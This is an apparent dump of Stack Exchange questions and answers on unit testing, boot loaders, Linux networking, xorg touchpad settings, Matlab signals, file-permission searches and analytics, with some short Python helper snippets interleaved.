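    """Load saved calibration, falling back to a default on first run."""
    path = base / "calibration.json"
    if not path.exists():
        return default
    return json.loads(path.read_text())
```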
_softwareengineering.34463 | So I'm not doing any unit testing. But I've had an idea to make it more appropriate for my field of use. Yet it's not clear whether something like this exists, and if so, what it would be called. Ordinary unit tests combine the test logic and the expected outcome. In essence the testing framework only checks for booleans (did this match, did the expected result occur). To generalize, the test code itself references the audited functions, and also spells out the expected result values, like so:

unit::assert( test_me() == 17 )

What I'm looking for is a separation of concerns. The test itself should only contain the tested logic. The outcome and result data should be handled by the unit testing or assertion framework. As an example:

unit::probe( test_me() )

Here the probe actually doubles as a collector in the first run, and afterwards as a verification method. The expected 17 is not mentioned in the test code, but is stored or managed elsewhere. What is this scheme called? Or what would you call it? I hope I can find some actual implementations with the proper terminology. Obviously such a pattern is unfit for TDD. It's strictly for regression testing. Also obviously, it cannot be used for all cases. Only the simpler test subjects can be analyzed that way; for anything else the ordinary unit test setup and assertion steps are required. And yes, this could be manually accomplished by crafting a ResultWhateverObject, but that would still require hardwiring that to the test logic. Also keep in mind that I'm inquiring about use with scripting languages, not about Java. I'm aware that the xUnit pattern originates there, and why it's hence as elaborate as it is. Btw, I've discovered one test execution framework which allows for shortening simple test notations to:

test_me(); // 17

While thus the result data is no longer coded in (it's a comment), that's still not a complete separation and of course would work only for scalar results.
| Term for unit testing that separates test logic from test result data | unit testing | There is such a thing as data-driven tests. These aren't the same thing you are asking for, but they may help with some of what you want. Basically, the idea is that we define data structures and perform tests based on them. An example:

translations = {
    1 : 'I',
    2 : 'II',
    4 : 'IV',
    125 : 'CXXV'
}

def test_roman():
    for number, roman in translations.items():
        assert to_roman(number) == roman
        assert from_roman(roman) == number

This makes it much easier to add additional test cases. In frameworks with support for it, this can easily be made to be recorded as many separate tests. I'm not sure what exactly you are attempting to get from your technique. You have to deal with all the setup of unit tests while skipping over what would seem to be a relatively minor part: specifying the output. It seems such a small saving and would only rarely be useful.
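The to_roman/from_roman functions are left undefined in the example above; a minimal Python implementation, just enough to make the sketch runnable (not production-grade, no input validation):

```python
ROMAN = [(1000, "M"), (900, "CM"), (500, "D"), (400, "CD"),
         (100, "C"), (90, "XC"), (50, "L"), (40, "XL"),
         (10, "X"), (9, "IX"), (5, "V"), (4, "IV"), (1, "I")]

def to_roman(number):
    """Greedy conversion: repeatedly subtract the largest value that fits."""
    out = []
    for value, numeral in ROMAN:
        while number >= value:
            out.append(numeral)
            number -= value
    return "".join(out)

def from_roman(roman):
    """Scan left to right; a numeral smaller than its successor is subtracted."""
    values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
    total = 0
    for i, ch in enumerate(roman):
        v = values[ch]
        if i + 1 < len(roman) and values[roman[i + 1]] > v:
            total -= v
        else:
            total += v
    return total

translations = {1: "I", 2: "II", 4: "IV", 125: "CXXV"}

def test_roman():
    for number, roman in translations.items():
        assert to_roman(number) == roman
        assert from_roman(roman) == number

test_roman()
```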
_webmaster.27647 | Not a major problem, but I would like to understand more about how some websites can serve different pages to a navigating user such that the browser doesn't visibly pass through a blank white page, whereas some sites cause the browser to display the white page for up to a few seconds. I can imagine this is partly due to network latency, but are there any other factors? Can I cause the background image / color not to flash white? | Avoiding background and main menu reloads (white flash) when users navigate my site? | html | The 'white flash' you're referring to is the browser drawing the webpage. There was a great question about how to track how long it takes different browsers to draw your website (latency aside). Another good question to refer to is how to speed up your site through various tools and techniques. But what I think you're looking for is AJAX (Asynchronous JavaScript And XML); this will allow you to reload page content without reloading the page, thereby completely avoiding the 'white flash.' EDIT: I just realized a technique that you could use that is extremely simple. You could use iframes! I didn't think of it because it's kind of an outdated technique. I haven't used it since high school, but using iframes you should be able to get the desired results.
_unix.339148 | I recently installed Kali Linux to enable me to dual-boot between Kali and Windows 7. I had to install Kali in UEFI mode, because that was the only thing that worked. Windows 7, however, is not installed in UEFI mode. Because of this I can't boot Windows from the UEFI GRUB loader. To fix this I installed rEFInd, as suggested by this answer. My problem is that rEFInd does not detect my Windows loader on /dev/sda1. I have uncommented the scanfor line in refind.conf and added hdbios as one of the options, without any success. I also uncommented uefi_deep_legacy_scan, although that shouldn't be necessary since everything is on the same disk (only different partitions). I have also tried manually adding the Windows loader to the list, but it doesn't even appear as an option when I boot (I probably did not add it correctly). Is there anything I can do to fix this? Does anyone know how I can manually add it to the list? Or is my Windows loader broken? If so, what can I do then? (I don't have any installation CD or anything like that for Windows.) | rEFInd does not find Windows 7 | kali linux;grub2;refind | null
_unix.368118 | I have an SD card in my Raspberry Pi, and I pulled the power on it. Now I cannot boot from it, or even read it from my (Fedora) laptop. When running fsck I get this error:

[bf@localhost ~]$ sudo fsck -V /dev/mmcblk0p2
fsck from util-linux 2.28.2
[/sbin/fsck.ext4 (1) -- /dev/mmcblk0p2] fsck.ext4 /dev/mmcblk0p2
e2fsck 1.43.3 (04-Sep-2016)
/dev/mmcblk0p2 has unsupported feature(s): FEATURE_I17
e2fsck: Get a newer version of e2fsck!

It somehow sees some unsupported feature that blocks any usage of the card. Any other fs tool (tune2fs, debugfs) gives the same error. | Cannot mount SD card after hard shutdown | ext4;fsck;sd card | null
_unix.192228 | I have a network topology in which a Dell PE860 runs a Linux virtual switch, br0: Now if I send an Ethernet frame to the broadcast address from the IBM ThinkCentre:

17:10:23.569021 00:a1:ff:01:02:05 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 34: 127.0.0.1 > 127.0.0.1: ip-proto-0 0

..then I see this frame in both virtual machines, as I should. If I send an Ethernet frame to a MAC address which is not known in the br0 MAC address table, then br0 also behaves correctly and floods the frame to all ports except the one where the frame came in (eth1 in this example). However, if I send a multicast frame from the IBM ThinkCentre:

17:17:05.513283 00:a1:ff:01:02:05 > 01:33:44:55:66:77, ethertype IPv4 (0x0800), length 34: 127.0.0.1 > 127.0.0.1: ip-proto-0 0

..then for some reason the Linux virtual switch does not flood it to all the ports (except the one where the frame came in from). Why is that so? I would expect the switch to handle multicast frames exactly like broadcast frames. | multicast frames in Linux virtual-switch | linux;bridge | null
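For reference when reading the dumps above: a bridge classifies the destination by the MAC address's I/G bit, the least significant bit of the first octet. A small Python helper that classifies the addresses seen in the question (illustrative only; it explains why 01:33:44:55:66:77 counts as multicast, not why the bridge withholds flooding):

```python
def mac_kind(mac):
    """Classify a MAC address: broadcast, multicast (I/G bit set) or unicast."""
    octets = [int(part, 16) for part in mac.split(":")]
    if all(o == 0xFF for o in octets):
        return "broadcast"
    if octets[0] & 0x01:  # I/G bit: group (multicast) address
        return "multicast"
    return "unicast"

for mac in ("ff:ff:ff:ff:ff:ff", "01:33:44:55:66:77", "00:a1:ff:01:02:05"):
    print(mac, mac_kind(mac))
```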
_codereview.155840 | I am wondering if I could implement this in a cleaner, more elegant, strictly functional way:

const convert2dArrayToJsonList = (array) => {
    if (!is2dArrayParsableToJsonList(array)) {
        throw new Error("The 2D array cannot be converted to a json list " + array);
    }
    const propertyKeys = array[0];
    return array
        .slice(1)
        .map( row => {
            return row.reduce( (accumulatedElement, propertyValue, currentIndex, array) => {
                accumulatedElement[propertyKeys[currentIndex]] = propertyValue;
                return accumulatedElement;
            }, {});
        });
}

The implementation of is2dArrayParsableToJsonList(array) is not relevant in this context; it does what it says. The 2D array parameter has the property keys in the top row, and all other rows represent individual elements in the list. | Converting a 2D array to a JSON list | javascript;array;functional programming | null
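For comparison, the transformation being reviewed is essentially "zip the header row with each data row"; a Python sketch of that idea (illustrative only, since the question itself concerns the JavaScript version):

```python
def rows_to_records(table):
    """First row holds the property keys; every later row becomes one dict."""
    header, *rows = table
    return [dict(zip(header, row)) for row in rows]

table = [["id", "name"], [1, "ada"], [2, "bob"]]
print(rows_to_records(table))
```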
_unix.125264 | I want to configure my system so that tap-to-click is disabled on the touchpad. (It's running a rather old version of ALTLinux distro with xorg-server-1.4.2-alt10.M41.1.)I'm interested in a solution without running synclient in each X session.Probably, my X server is too old so that it doesn't understand InputClass sections in xorg.conf, as suggested in another answer by Vincent Nivoliers:Section InputClass Identifier touchpad catchall Driver synaptics MatchIsTouchpad on MatchDevicePath /dev/input/event* Option MaxTapTime 0EndSectionThe I get an error; from Xorg.*.log:(==) Using config file: /etc/X11/xorg.confParse error on line 71 of section InputClass in file /etc/X11/xorg.conf InputClass is not a valid section name.(EE) Problem parsing the config file(EE) Error parsing the config fileAlso, my xorg.conf doesn't have any explicit InputDevice sections (with a comment: With libXiconfig we don't need configuration for ps and usb mice.).How do I put the MaxTapTime option into my xorg.conf so that the configuration of my input devices (including the touchpad) is not broken? (If I write explicit InputDevice sections, I might break the correct configuration obtained automatically..)Perhaps, the output of xinput list can be of some use. I do not want to make the question too specific by posting my xinput list and asking what to do in this specific case. 
Let it be just an example:$ xinput listVirtual core keyboard id=0 [XKeyboard] Num_keys is 248 Min_keycode is 8 Max_keycode is 255Virtual core pointer id=1 [XPointer] Num_buttons is 32 Num_axes is 2 Mode is Relative Motion_buffer is 256 Axis 0 : Min_value is 0 Max_value is -1 Resolution is 0 Axis 1 : Min_value is 0 Max_value is -1 Resolution is 0AT Translated Set 2 keyboard id=4 [XExtensionKeyboard] Type is KEYBOARD Num_keys is 248 Min_keycode is 8 Max_keycode is 255PS/2 Mouse id=3 [XExtensionPointer] Type is MOUSE Num_buttons is 32 Num_axes is 2 Mode is Relative Motion_buffer is 256 Axis 0 : Min_value is -1 Max_value is -1 Resolution is 1 Axis 1 : Min_value is -1 Max_value is -1 Resolution is 1AlpsPS/2 ALPS GlidePoint id=2 [XExtensionPointer] Type is TOUCHPAD Num_buttons is 12 Num_axes is 2 Mode is Relative Motion_buffer is 256 Axis 0 : Min_value is 0 Max_value is -1 Resolution is 1 Axis 1 : Min_value is 0 Max_value is -1 Resolution is 1$ I expect the answer to give some general advice, not specific for this case. | Can one disable tap-to-click in X server configuration without InputClass sections? | xorg;touchpad;x server;xinput;altlinux | Besides InputClass there also exists a section called InputDevice which takes nearly the exact same options as InputClass. Of course you cannot use the Match* operators but have to give the device's path explicitly:Section InputDevice Identifier touchpad Driver synaptics Option Device /dev/input/event<X> Option MaxTapTime 0EndSectionYou'll just have to replace <X> with the appropriate device number. |
_codereview.157809 | I sometimes do experiments at work and separate the computation and the analysis so I can do the computation on a cluster and the analysis locally, and sometimes in a Jupyter notebook. I wrote a class which allows me to save results to a hidden file as if it were a dictionary. The idea is to create an object specifying the name of the experiment and from there you can use it as a dictionary, and it is saved to disk so you can access it from other python files. I'd appreciate any thoughts since IO isn't my forte. I used python 2.7 but I think it should work for python 3.0

import os
import cPickle as pickle

class FileDict():
    def __init__(self, name, default = None):
        self.fpath = '.{}.fd'.format(name)
        self.default = default

    def __getitem__(self, key):
        if os.path.isfile(self.fpath):
            d = pickle.load(open(self.fpath))
            if key in d:
                return d[key]
            else:
                return self.default

    def __setitem__(self, key, value):
        if os.path.isfile(self.fpath):
            d = pickle.load(open(self.fpath))
            d[key] = value
        else:
            d = {key : value}
        pickle.dump(d, open(self.fpath, 'w'))

if __name__ == '__main__':
    test = FileDict('test', 0)
    print(test[1])
    test[1] = 'thing'
    print(test[1])
    print(test[2])
 | A python default dictionary which seamlessly saves to disk | python;python 2.7;file;io;dictionary | null
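Since the answer field is empty, here is one hedged sketch of how the class might be tightened: Python 3, context managers so file handles are closed, binary pickle mode, and a single load helper. Note this sketch deliberately returns the default both when the file is missing and when the key is missing, which may differ from the original's missing-file behaviour.

```python
import os
import pickle

class FileDict:
    """Dict-like object persisted to a hidden pickle file (a sketch,
    not the original poster's code)."""

    def __init__(self, name, default=None):
        self.fpath = '.{}.fd'.format(name)
        self.default = default

    def _load(self):
        # Read the whole dict back, or start empty if no file yet.
        if os.path.isfile(self.fpath):
            with open(self.fpath, 'rb') as f:
                return pickle.load(f)
        return {}

    def __getitem__(self, key):
        return self._load().get(key, self.default)

    def __setitem__(self, key, value):
        d = self._load()
        d[key] = value
        with open(self.fpath, 'wb') as f:
            pickle.dump(d, f)
```

The context managers matter on non-CPython runtimes, where unclosed handles from open(...) expressions are not reclaimed promptly, and 'rb'/'wb' are required for pickle on Python 3.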
_cs.62323 | In which stage (on an ideal 5-stage pipeline) are branches and hazards handled? What is the branch penalty for a branch hazard or data hazard? Are there different stages at which hazards are detected (meaning, for example, that branch hazards occur at the 2nd stage in the pipeline), or are all hazards detected at a specific stage? | Basic question about branches and pipelines | cpu pipelines | null
_unix.303949 | I have a directory that contains several sub-directories. There is a question about zipping the files that contains an answer that I ever-so-slightly modified for my needs.

for i in */; do zip zips/${i%/}.zip "$i*.csv"; done

However, I run into a bizarre problem. For the first set of folders, where zips/<name>.zip does not exist, I get this error:

zip error: Nothing to do! (zips/2014-10.zip)
 zip warning: name not matched: 2014-11/*.csv

however when I just echo the zip statements:

for i in */; do echo zip zips/${i%/}.zip "$i*.csv"; done

Then run the echoed command (zip zips/2014-10.zip 2014-10/*.csv), it works fine and zips up the folder. Then the fun part about that is that subsequent runs of the original command will actually zip up folders that didn't work the first time!

To test this behavior yourself:

cd /tmp
mkdir -p 2016-01 2016-02 2016-03 zips
for i in 2*/; do touch $i/one.csv; done
for i in 2*/; do touch $i/two.csv; done
zip zips/2016-03.zip 2016-03/*.csv
for i in 2*/; do echo zip zips/${i%/}.zip "$i*.csv"; done
for i in 2*/; do zip zips/${i%/}.zip "$i*.csv"; done

You'll see that the echo prints these statements:

zip zips/2016-01.zip 2016-01/*.csv
zip zips/2016-02.zip 2016-02/*.csv
zip zips/2016-03.zip 2016-03/*.csv

However, the actual zip command will tell you:

 zip warning: name not matched: 2016-01/*.csv
zip error: Nothing to do! (zips/2016-01.zip)
 zip warning: name not matched: 2016-02/*.csv
zip error: Nothing to do! (zips/2016-02.zip)
updating: 2016-03/one.csv (stored 0%)
updating: 2016-03/two.csv (stored 0%)

So it's actually updating the zip file with the .csvs where the zip file exists, but not when the zip file is created. And if you copy one of the zip commands:

$ zip zips/2016-02.zip 2016-02/*.csv
adding: 2016-02/one.csv (stored 0%)
adding: 2016-02/two.csv (stored 0%)

Then re-run the zip-all-the-things:

for i in 2*/; do zip zips/${i%/}.zip "$i*.csv"; done

You'll see that it updates for 2016-02 and 2016-03. Here's my output of tree:

.
├── 2016-01
│   ├── one.csv
│   └── two.csv
├── 2016-02
│   ├── one.csv
│   └── two.csv
├── 2016-03
│   ├── one.csv
│   └── two.csv
└── zips
    ├── 2016-02.zip
    └── 2016-03.zip

Also, (un)surprisingly, this works just fine:

zsh -c $(for i in 2*/; do echo zip zips/${i%/}.zip $i*.csv; done)

What am I doing wrong here? (note, I am using zsh instead of bash, if that makes any difference) | Why does `zip` in a for loop work when the file exists, but not when it doesn't? | shell script;shell;zsh;quoting;zip | Expansion by the shell

The quotes around "$i*.csv" make the difference. With the quotes, the shell expands that string to 2014-11/*.csv. That exact file doesn't exist, and zip reports an error. Without quotes, the * also expands (via filename expansion/globbing), and the resulting zip command is a complete list of matching files, each as a separate argument. You can get the second behaviour, inside the for loop, with:

for i in */ ; do zip zips/${i%/}.zip $i*.csv ; done

Expansion by zip

zip can also expand wildcards for itself, but not in all situations. From the zip manual:

The zip program can do the same matching on names that are in the zip archive being modified or, in the case of the -x (exclude) or -i (include) options, on the list of files to be operated on, by using backslashes or quotes to tell the shell not to do the name expansion.

The original command works on subsequent attempts, after you've successfully created an archive, because zip tries to match the wildcards against the contents of the existing archive. They exist there, and still exist on the filesystem, so they're reported with updating:.

To get zip to handle the wildcards when creating the archive, use the -r (recurse) option to recurse into the requested directory, and -i (include) to limit it to files matching the pattern:

for i in */ ; do zip -r zips/${i%/}.zip $i -i '*.csv' ; done
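The shell-side half of this answer is easy to reproduce outside the shell. A small Python sketch (illustrative only, using the stdlib glob module) shows the two argument lists zip would receive with and without quoting:

```python
import glob
import os
import tempfile

# Build a throwaway 2016-01/one.csv like the question's test case.
tmp = tempfile.mkdtemp()
os.mkdir(os.path.join(tmp, '2016-01'))
open(os.path.join(tmp, '2016-01', 'one.csv'), 'w').close()

pattern = os.path.join(tmp, '2016-01', '*.csv')

# Unquoted in the shell: the glob is expanded before zip ever runs,
# so zip's argv holds real file names.
expanded = glob.glob(pattern)
print(expanded)

# Quoted: zip's argv holds the literal pattern, one string containing
# a '*', and it is up to zip to match it (against an existing archive).
literal = [pattern]
print(literal)
```

The first list is what the unquoted loop passes; the second, single-element list is what the quoted loop passes, which only works once an archive exists for zip to match against.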
_unix.308181 | Fig. 1 Pressing two times CTRL+C in Terminal does not act but puts two line breaks in Matlab's command lineI think there is something wrong with the keybindings. I have tried both Windows and Emacs unsuccessfully. The keybinding works in Mathematica. Debian 8.x is supported by MathWorks for Matlab so it should be supported. Related conditionsTyping CTRL+C in Matlab's prompt does not enter kill but a line break...Differential solutionsOpen Matlab's prompt and enter exit. Open System Monitor and give kill and/or force kill signal to Matlab Matlab: 2016a, 2016b prereleaseHardware: Asus Zenbook UX303UAOS: Debian 8.5Linux kernel: 4.6 (backports)Related: [could not find finally anything; most conditions are related to the condition where you type the thing directly in Matlab's prompt]Service ticket of MathWorks: 02154064 | Why Matlab 2016a cannot be killed by Terminal's CTRL-C in Debian 8.5? | debian;keyboard shortcuts;kill;matlab | The default meaning of Ctrl+C is to send the signal SIGINT. The conventional meaning of SIGINT is to halt the task that's currently running in the foreground and let the user provide new input. I'm using task in the informal meaning of whatever the computer is doing. This is not necessarily a separate process. In a program like Matlab that reads successive commands and processes them a REPL SIGINT is supposed to bring the user back to that program's prompt, not to kill the program. When the foreground task is a program that does one job and then exits, SIGINT is supposed to kill the program since that's the way to bring the user back to the shell prompt.Try Ctrl+\. This sends the signal SIGQUIT, and the conventional meaning of SIGQUIT is to exit immediately and (if the system is configured for it) leave a core dump. 
Not all programs keep that meaning; I don't know if Matlab does.

If the kill signal keys aren't working, try Ctrl+Z to send SIGTSTP, which suspends the program and brings you back to a shell prompt where you can send some other signal. When you suspend a job, the shell shows a message like

[1]+  Stopped                 matlab

The number in brackets is the job number. You can use %1 instead of a process ID to send a signal to the process from that shell, e.g. kill %1 here to send SIGTERM (the normal kill signal), and if that doesn't work then kill -KILL %1 (SIGKILL, the kill signal that doesn't give the application a chance).

If you can't interrupt the application to reach the shell running on that terminal, kill it from another shell running in another terminal.
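The REPL convention described above (catch SIGINT and return to the prompt instead of dying) can be demonstrated with a short Python sketch; it assumes a POSIX system and simulates the keypress by signalling its own process:

```python
import os
import signal

caught = []

def on_sigint(signum, frame):
    # A REPL-style program installs a handler like this and goes back
    # to its prompt instead of dying, the behaviour Matlab shows.
    caught.append(signum)

signal.signal(signal.SIGINT, on_sigint)
os.kill(os.getpid(), signal.SIGINT)  # stand-in for pressing Ctrl+C
print('still running; caught signal number', caught[0])
```

With the handler installed the process survives the signal, exactly as Matlab survives Ctrl+C; without one, Python's default behaviour is to raise KeyboardInterrupt and exit.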
_cstheory.4866 | Given a directed graph $G=(V,A)$ with a unique source node $s$ (a node without incoming edges) and a unique sink node $t$ (a node without outgoing edges).Given a sequence of variables $SEQ = (x_{i_1},x_{i_2},...,x_{i_m})$ with $|SEQ| > 2$ and each $i_j \in [1..m]$For example $SEQ = (x_1,x_2,x_3,x_4,x_2,x_3,x_5)$ (m=5).A node assignment is a function $f: \{x_1,...,x_m\} \rightarrow V$ such that if $i \neq j$ then $f(x_i) \neq f(x_j)$ (it maps each $x_j$ to a different node of the graph). Now, if in $SEQ$ we substitute $x_j$ with $f(x_j)$ we obtain a sequence $NODESEQ$ of nodes.We want to start from $s$ and end in $t$ so trivially $x_1 = s, x_m = t$.For example: $NODESEQ = (s,v_1,v_7,v_9,v_1,v_7,t)$A valid node assignment is an assignment such that if we substitute each $x_{i_j}$ with $f(x_{i_j})$ in the sequence $SEQ$ we obtain a valid path from $s$ to $t$.Problem 1:Given a directed graph $G$ with one source and one sink and a sequence of variables $SEQ$ check if a valid node assignment exists.I'm not an expert, but if we take $m=n=|V|$ and $SEQ=(x_1,...,x_n)$ then the problem becomes the Hamiltonian Path problem. Informally HAM-PATH can be reduced to Problem 1, adding a source node $s$ and a sink node $t$, two extra variables at the beginning and end of $SEQ$: $(x_s,x_1,...,x_n,x_t)$ and edges $(s,u), (v,t)$ for every $u,v \in V$, (hence Problem 1 is in NPC).But we can modify it and drop the condition that if $i \neq j$ then $f(x_i) \neq f(x_j)$ i.e we can assign the same node $v$ to more than one $x_i$ (I call it relaxed node assignment). We get an (apparently) simpler problem.Problem 2:Given a directed graph $G$ with one source and one sink and a sequence of variables $SEQ$ check if a valid **relaxed node assignment** exists.An informal way to describe the problem: we have a chain made of segments. Now we wrap it up in some casual order and join some innermost endpoints. 
Problem 2 consists of checking whether such a wrapped chain can fit in a given graph. Is this problem known? Is it still an NPC problem? | Is it easy to fit a wrapped chain in a graph? | ds.algorithms;graph algorithms | Allow me to try to redeem my previous incorrect answer with an attempt at showing that this problem is NP-complete via a reduction from GRAPH 3-COLORABILITY. The key idea is to identify $SEQ$ as a list of edges of some graph and observe that a relaxed node assignment corresponds to a graph homomorphism.

Let $H = (U, E)$ be a connected, undirected graph with $U = \{u_1, u_2, \ldots, u_n\}$. Let $P = (u_{a_1}, u_{a_2}, \ldots, u_{a_p})$ be a (non-simple) path in $H$ that traverses every edge at least once (i.e.: if there is an edge between $u_i$ and $u_j$, then they appear consecutively in $P$ in either order). First, we need to show that $P$ is not too long. We can construct $P$ as follows:

- Start at $u_1$.
- Visit each neighbor of $u_1$, returning to $u_1$ after each visit. I.e., if the neighbors of $u_1$ are $u_{n_1}, u_{n_2}, \ldots, u_{n_d}$, we have the following sequence: $u_1, u_{n_1}, u_1, u_{n_2}, u_1, \dots, u_1, u_{n_d}, u_1$.
- Travel to $u_2$.
- Visit each neighbor of $u_2$.
- etc...

By visiting each vertex's neighbors, each edge in $H$ is traversed. Each neighbor visitation step adds $O(n)$ steps to the path. Each travel to a successive vertex adds another $O(n)$ steps. So, in total, the length of $P = (u_{a_1}, u_{a_2}, \ldots, u_{a_p})$ is $O(n^2)$.

Let $SEQ = (x_0, x_{a_1}, x_{a_2}, x_{a_3}, \ldots, x_{a_p}, x_{n+1})$ be the sequence of variables.

Let $G = (V, A)$ be the complete directed graph on three vertices, adjoined with a universal source and a universal sink. Explicitly, let $V = \{v_1, v_2, v_3, v_{source}, v_{sink}\}$. There is an arc from $v_{source}$ to $v_i$ and from $v_i$ to $v_{sink}$ for $i=1,2,3$. And, for all $i,j = 1,2,3$, $i \neq j$, there is an arc from $v_i$ to $v_j$.
Finally, we claim that a valid relaxed node assignment from $SEQ$ to $G$ exists iff $H$ is 3-colorable. Let $c:U \rightarrow \{1,2,3\}$ be a 3-coloring of $H$. Let $f:X \rightarrow V$ be defined by:

$f(x_0) = v_{source}$
$f(x_{n+1}) = v_{sink}$
$f(x_i) = v_{c(u_i)}$

It should be clear that $f$ is a valid relaxed node assignment. It should be equally clear that we can reverse this construction to use any valid relaxed node assignment to define a 3-coloring of $H$.
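The walk construction in the answer can be sanity-checked in code. The following sketch is an illustration added here, not part of the answer: the helper is restricted to graphs where consecutive vertices in the visiting order are adjacent (for example complete graphs), so the O(n) "travel" step collapses to a single hop; general connected graphs would need a connecting path there. It builds $P$ and checks that every edge appears consecutively:

```python
from itertools import combinations

def edge_covering_walk(adj, order):
    """Build the walk P from the proof, assuming consecutive vertices
    in `order` are adjacent (true for complete graphs)."""
    walk = [order[0]]
    for u in order:
        if walk[-1] != u:
            walk.append(u)          # "travel to the next vertex" step
        for v in adj[u]:
            walk.extend([v, u])     # visit each neighbor, return to u
    return walk

adj = {1: [2, 3], 2: [1, 3], 3: [1, 2]}      # K_3
walk = edge_covering_walk(adj, [1, 2, 3])
# Every edge {u, v} must occur as a consecutive pair somewhere in P.
pairs = set(map(frozenset, zip(walk, walk[1:])))
assert all(frozenset(e) in pairs for e in combinations(adj, 2))
print(walk)
```

For $K_3$ the walk has 15 vertices, consistent with the $O(n^2)$ bound claimed in the answer.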
_softwareengineering.264381 | I have an angular app that concentrates most of its functionality around a primary entity that has several satellite entities. The UI for this is effectively one screen, with a few tabs, one for each satellite. There are also some modal dialogs with content for a couple of the satellites that deserve their own subview, produced by clicking on a link in a tab.The controller for this screen is growing rather large, as it has a set of REST calls for each entity, along with functions to produce and dismiss the various dialogs. All the subviews for the tabs are stuffed into the main screen as well, inside a tab set.How can I split out these files, giving each tab its own controller and view? | How can I structure my angular app so that I don't end up with one huge controller and view? | mvc;angularjs | null |
_webmaster.10452 | Say I have a site 123example.com, with roughly 100 backlinks, which has increased from a google page 27 to page 12 for my keywords over the last month and continues toward the top 10... I have another domain 123.com, which has roughly 30 backlinks, that just points to the 1st domain. I would like to use 123.com as the primary domain and use a 301 redirect on 123example.com.Would I have to start my link building back over again for 123.com or will the backlinks and PR with the 301 redirect of 123example.com transfer over to the new domain? | 301 redirect and page ranking | domains;pagerank;301 redirect | null |
_unix.67890 | I am using Debian Squeeze. Suddenly I have started facing a problem that my user is not able to make directories and other such tasks. Running mkdir abc gives memkdir: cannot create directory 'abc': Disk quota exceededMy hard disk is not full df -h results areFilesystem Size Used Avail Use% Mounted on/dev/md1 1.8T 39G 1.8T 3% /tmpfs 7.8G 0 7.8G 0% /lib/init/rwudev 7.8G 148K 7.8G 1% /devtmpfs 7.8G 0 7.8G 0% /dev/shm/dev/md0 243M 31M 200M 14% /bootuname -a output that might be needed isLinux server 2.6.32-5-686-bigmem #1 SMP Sun Sep 23 10:27:25 UTC 2012 i686 GNU/LinuxNote: If I login as root then everything is fine. This problem is only with a particular userEdit: output of quotaDisk quotas for user user (uid 1000): noneoutput of quota -gDisk quotas for group user (gid 1000): Filesystem blocks quota limit grace files quota limit grace/dev/disk/by-uuid/26fa7362-fbbf-4a9e-af4d-da6c2744263c8971324* 1048576 1048576 none 43784 0 0 | Disk quota exceeded problem | debian | The disk isn't full, but the disk space allowed for this user is full. You need to check quota(1), perhaps persuade the suspect to clean up their junk, or in an outburst of kindness increase it with edquota(8). |
_unix.318654 | How could I go about finding uneven file/directory permissions within a directory structure? I've made some attempts at using the find command similar to:

find /bin ! \( -perm 777 -o -perm 776 -o -perm 775 -o -perm 774 -o -perm 773 -o -perm 772 -o -perm 771 -o -perm 770 -o -perm 760 -o -perm 750 -o -perm 740 -o -perm 730 -o -perm 720 -o -perm 710 -o -perm 700 -o -perm 600 -o -perm 500 -o -perm 400

but I run out of command line before I can complete the remaining permutations plus an -exec ls -lL {} \;

I've also been doing manual things similar to:

ls -lL /bin | grep -v ^-rwxr-xr-x | grep -v ^-rwx--x--x | grep -v ^-rwsr-xr-x | grep -v ^-r-xr-xr-x | grep -v ^-rwxr-xr-t

but again, I run out of command line before I can complete the remaining permutations. Both methods seem unusually awkward. Is there a better, faster, easier way? Note that I'm restricted in the shell I'm using (sh) and platform (Irix 6.5.22). | How would I find uneven file permissions within a directory structure? | permissions;find;security;irix | Are you looking for executable files?

find . -type f -perm /+x

Regardless, the / mode is more than likely your friend... here is the man page:

-perm /mode
    Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples. If no permission bits in mode are set, this test matches any file (the idea here is to be consistent with the behaviour of -perm -000).

UPDATE: right, I thought you were looking for uneven numbers (executable ones)... this should work (still using the 3rd perm param from find). Sample data:

$ ls
000 001 002 003 004 005 006 007 010 020 030 040 050 060 070 100 200 300 400 500 600 700

Find command:

$ find . 
-type f \( -perm /u-x,g+x -o -perm /u-w,g+w -o -perm /u-r,g+r -o -perm /g-x,o+x -o -perm /g-w,o+w -o -perm /g-r,o+r -o -perm /u-x,o+x -o -perm /u-w,o+w -o -perm /u-r,o+r \) | sort
./001
./002
./003
./004
./005
./006
./007
./010
./020
./030
./040
./050
./060
./070

Basically you are saying: give me files where group has perms but owner does not, or files where world has perms but group does not, or where world has perms but owner does not.

note: find has 3x perm params:
-perm mode
-perm -mode
-perm /mode

PS: I'm not all too sure of the value of this...
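If find's GNU-style /mode predicate turns out not to exist on Irix, the same "uneven" test can be scripted. Here is a hedged Python sketch (an addition for illustration, not from the answer, and not tested on Irix); it flags any path where the group or "other" class holds a permission bit that a more privileged class lacks:

```python
import os
import stat

def uneven_paths(root):
    """Yield (path, mode) where group/other have bits the owner lacks."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            # Split the low nine bits into user/group/other triads.
            u, g, o = (mode >> 6) & 7, (mode >> 3) & 7, mode & 7
            # Uneven: e.g. g+w while u-w, or o+r while g-r or u-r.
            if (g & ~u) or (o & ~g) or (o & ~u):
                yield path, oct(mode & 0o777)
```

For example, a mode 644 file is even and is skipped, while a mode 047 file is flagged; list(uneven_paths('/bin')) would report every such oddity under /bin.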
_webmaster.78322 | I am a UX designer, and one of my clients had some questions for me about Google Analytics. His organization has a Facebook page and uses some paid Facebook advertising. The comments on many of his Facebook posts (which promote his new blog articles) come from his site's regular readers.Using a time scale in the past 30 days, Google Analytics is showing about 72% new users for his site. In the same time period, about 65% of his traffic from Facebook is new users. (If I shorten the time period to just yesterday, it's about 45% from Facebook and 63% from all sources.) Since he expects most of his audience is regular readers, he would like to know: why would Google Analytics be showing so much of his audience as new?I told him that it's likely to be happening because of some combination of users using private browsing / Do Not Track and cookies not persisting between sessions. But we would like to know if there are any other factors. | Why does Google Analytics show such a high percentage of traffic from Facebook as new users? | google analytics | null |
